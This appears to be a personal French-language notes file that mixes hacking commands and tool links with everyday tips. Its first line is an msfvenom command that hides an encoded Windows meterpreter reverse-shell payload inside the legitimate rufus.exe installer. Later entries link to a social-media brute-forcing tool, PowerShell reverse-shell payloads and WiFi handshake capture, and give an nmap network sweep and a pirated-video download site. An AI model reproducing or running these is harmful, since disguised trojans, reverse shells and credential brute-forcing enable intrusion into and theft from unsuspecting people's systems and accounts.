
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f raw -x rufus.exe -f exe-only -e x86/bf_xor -o output.exe

Voici un repo pur changer le thème de la page de connexion 
https://github.com/kp300/BACKGROUND-LOGIN-SCREEN

Voici le script pour installer la msfconsole sur termux
https://github.com/vaimpier-ritik/Metasploit-Installation

Voici le lien de la commande pour installer xfce a partir de gnome
https://gist.github.com/jayluxferro/5cb6ee45726bd30264918df2b0553b70

Voici le lien pour bruteforce les réseaux sociaux 
https://github.com/TunisianEagles/SocialBox.git

Voici le lien pour les payload powershell
https://github.com/ZHacker13/ReverseTCPShell

ytmusic 
https://ytmdesktop.app

https://www.googleplaymusicdesktopplayer.com/  (switcher vers youtube music)

Capturer handshake 
https://github.com/v1s1t0r1sh3r3/airgeddon

tar -xvf

apt --fix-broken install

pip3 install osrframework

https://www2.zone-warez.com/telecharger-series/486329-family-business-WEB-DL%201080p-French.html

nmap -sn 192.168.1.0/24


integrer sous titre a video :
1_ Télécharger et installer le logiciel gratuit et élémentaire pour les vidéos en mkv -> ToolNix [ https://www.fosshub.com/MKVToolNix.html ]
2_ Ouvrir ToolNix.
3_ dans "Source"-> "Fichiers source" importer la vidéo mkv.
4_ dans "Source"-> "Fichiers source" importer aussi le fichier de sous-titres (SRT, SSA, ASS, USF etc...).
5_ Cocher mutiplexage sur "Oui" pour les pistes nécessaires.
6_ Choisir le nom et le dossier de destination du fichier fini.
7_ Lancer le multiplexage (bouton central en bas).
8_ Fin :)

username uptobox : snowy2701151
